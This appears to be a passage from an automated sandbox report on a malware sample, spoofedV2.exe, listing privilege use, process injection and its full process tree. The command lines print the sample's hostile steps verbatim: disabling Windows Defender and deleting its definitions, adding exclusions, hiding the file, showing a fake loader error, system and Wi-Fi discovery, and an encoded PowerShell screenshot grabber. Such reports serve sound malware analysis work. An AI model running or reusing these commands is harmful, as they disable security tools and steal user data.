N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4308 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe
PID 4308 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe
PID 352 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 4000 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4000 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2848 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3684 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3684 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3928 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4312 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4312 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 352 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 4816 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4816 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3432 wrote to memory of 3160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3432 wrote to memory of 3160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 352 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2296 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2020 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3776 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3776 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2220 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2220 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4284 wrote to memory of 1028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 1028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4840 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3328 wrote to memory of 3332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3328 wrote to memory of 3332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2136 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 352 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe
PID 352 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code - 10X8', 0, 'Loader Failure', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  ​ .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code - 10X8', 0, 'Loader Failure', 0+16);close()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  ​ .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

